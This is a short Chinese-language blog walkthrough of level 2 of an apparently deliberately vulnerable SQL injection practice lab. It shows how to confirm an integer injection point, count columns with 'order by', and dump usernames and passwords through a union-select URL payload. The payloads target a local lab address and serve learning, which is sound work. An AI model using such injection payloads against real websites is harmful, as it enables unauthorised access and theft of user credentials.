Less-2

Less-2

第二关：同样使用url传递参数id的值

 

（1)判断注入点

输入特殊字符，存在报错信息，发现这里未过滤且是id值是整型，区别于第一关的字符型

 

 

(2)进行字段和数据库信息注入

#查询字段数
http://192.168.88.133/mysqli-labs/Less-2/?id=1 order by 4 --+
#将4换成3显示正常
#后面的步骤和第一关的语句相同，去掉单引号即可，可以参考第一关的文章https://www.cnblogs.com/stickonit/p/16049775.html

#爆出用户信息
http://192.168.88.133/mysqli-labs/Less-2/?id=-1  union select 1,group_concat(username,0x3a,password,0x3c,0x62,0x72,0x2f,0x3e),3  from users--+ 

 

 

 

 注：本人也在学习阶段，有错误或疑惑的地方欢迎指正和交流。